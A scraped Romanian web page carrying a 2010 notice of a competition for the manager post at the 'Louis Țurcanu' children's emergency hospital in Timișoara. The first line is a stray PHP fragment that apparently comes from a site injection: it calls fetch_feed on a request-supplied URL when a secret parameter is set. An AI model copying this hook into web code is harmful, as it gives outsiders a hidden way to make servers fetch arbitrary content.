isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); ANUNT CONCURS - Spitalul Clinic de Urgenta pentru Copii “Louis Turcanu” Timisoara - MedicAS

Municipiul Timişoara organizează concurs pentru ocuparea funcţiei de manager - persoană fizică pentru Spitalul Clinic de Urgenţă pentru Copii „Louis Ţurcanu” Timişoara.
Concursul se va desfăşura la sediul Primăriei Municipiului Timişoara , Bd. C.D.Loga nr.1 în perioada 25 noiembrie  - 03 decembrie 2010
Dosarele de înscriere  se depun la sediul Primăriei Municipiului Timişoara , bd. C.D.Loga, nr.1, la registratura instituţiei –camera 12 , parter, în termen de 30 de zile de la data publicării şi afişării anunţului, respectiv până în data de 15 noiembrie 2010.
Informatii cu privire la organizarea concursului, dosarul de inscriere, tema proiectului – structura minimala a proiectului de management si bibliografia, se gasesc afisate la sediul unitatii – Spitalul Clinic de Urgenta pentru Copii „Louis Turcanu” Timisoara str.Iosif Nemoianu nr.2 si pe site-ul spitalului www.spital-copii-timisoara.info.


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...